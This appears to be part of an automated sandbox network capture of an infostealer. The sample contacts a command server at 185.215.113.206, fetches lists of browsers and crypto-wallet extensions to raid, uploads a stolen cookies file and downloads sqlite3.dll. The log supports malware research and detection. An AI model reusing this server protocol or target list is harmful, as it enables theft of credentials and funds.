                                                                                                                                                                                                                                                                                                                    Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.362083912 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                                                                                    Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.382304907 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFI
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 267
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="message"plugins------CGDBFBGIDHCAAKEBAKFI--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.845395088 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:15 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Content-Length: 7116
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.845463037 CET124INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                                                                                    Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.845763922 CET1236INData Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32
                                                                                                                                                                                                                                                                                                                    Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.845824957 CET1236INData Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46
                                                                                                                                                                                                                                                                                                                    Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.845838070 CET1236INData Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d
                                                                                                                                                                                                                                                                                                                    Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.845938921 CET1236INData Raw: 61 32 78 69 66 44 46 38 4d 48 77 77 66 45 4e 76 62 57 31 76 62 6b 74 6c 65 58 78 6a 61 47 64 6d 5a 57 5a 71 63 47 4e 76 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 77 78 66 44 42 38 4d 48 78 61 62 32
                                                                                                                                                                                                                                                                                                                    Data Ascii: a2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnB
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.854181051 CET1040INData Raw: 4d 58 77 77 66 44 42 38 51 32 39 74 63 47 46 7a 63 79 42 58 59 57 78 73 5a 58 51 67 5a 6d 39 79 49 46 4e 6c 61 58 78 68 62 6d 39 72 5a 32 31 77 61 47 35 6a 63 47 56 72 61 32 68 6a 62 47 31 70 62 6d 64 77 61 57 31 71 62 57 4e 76 62 32 6c 6d 59 6e
                                                                                                                                                                                                                                                                                                                    Data Ascii: MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.884805918 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJE
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 268
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="message"fplugins------KJEGDBKFIJDAKFIDGHJE--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:16.347172976 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:16 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Content-Length: 108
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                                                                                    Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:16.604732990 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 7539
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:16.604784012 CET7539OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:17.700325966 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:16 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:17.703754902 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:18.164609909 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:17 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Content-Length: 1106998
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:18.164665937 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:18.168756008 CET1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                                                                                                    Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    1192.168.2.749755185.215.113.206805788C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.729180098 CET629OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------AKKKECBKKECGCAAAEHJK--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.618483067 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:28 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.971596003 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HJDGCGDBGCAAEBFIECGH
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 363
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
